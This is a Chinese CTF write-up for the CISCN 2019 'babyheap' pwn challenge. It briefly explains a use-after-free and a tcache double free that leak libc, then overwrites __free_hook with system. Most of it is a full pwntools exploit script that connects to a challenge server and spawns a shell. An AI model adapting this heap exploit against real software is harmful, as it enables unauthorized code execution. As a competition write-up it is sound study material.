ciscn2019-c06

国赛时坐在五号机旁边看着他搓出来的,五号机tql

简单分析

1
2
3
4
welcome to babyheap
1. add
2. remove
choice >

C++写的程序,只有add和remove两个功能,但是在add时会打印出分配的堆地址。remove的时候free之后没有置0,存在UAF。

此外,C++程序会为cin和cout分配两个堆,这一题就是利用double free tcache申请到cout的堆,free之后直接进入unsortedbin。再利用add时打印地址leak出main_arena的地址。

之后就是常规的修改freehook为system,free一个内容为/bin/sh的chunk。

EXP

1
from pwn import *
#sh = process('./ciscn_final_3.dms')
libc = ELF('./libc.so.6')
sh = remote("f.buuoj.cn",20232)
def add(index, size, s):
    sh.sendlineafter('choice >', '1')
    sh.sendlineafter('input the index', str(index))
    sh.sendlineafter('input the size', str(size))
    sh.sendafter('now you can write something', s)
def delete(index):
    sh.sendlineafter('choice >', '2')
    sh.sendlineafter('input the index', str(index))
add(0,0x70,"/bin/sh\x00")
sh.recvuntil("gift :")
chunk0addr=int(sh.recv(14),16)
leakchunk=chunk0addr-0x11c20
log.success("leakchunkaddr: "+hex(leakchunk))
add(1,0x10,"1")
delete(1)
delete(1)
add(2,0x10,p64(leakchunk+0x10))
add(3,0x10,'3')
add(4,0x10,'leakchunk1')
add(5,0x20,'5')
delete(4)
delete(5)
delete(5)
add(6,0x20,p64(leakchunk+0x10))
add(7,0x20,'7')
add(8,0x20,'8')
add(9,0x20,'leakchunk2')
sh.recvuntil("gift :")
leakchunk2addr=int(sh.recv(14),16)
freehook=leakchunk2addr+0x1c48
log.success("freehook: "+hex(freehook))
system=freehook-libc.sym['__free_hook']+libc.sym['system']
log.success("system: "+hex(system))
add(10,0x30,'10')
delete(10)
delete(10)
add(11,0x30,p64(freehook))
add(12,0x30,'12')
add(13,0x30,p64(system))
delete(0)
#gdb.attach(sh)
sh.interactive()
文章目录
  1. 1. 简单分析
  2. 2. EXP
|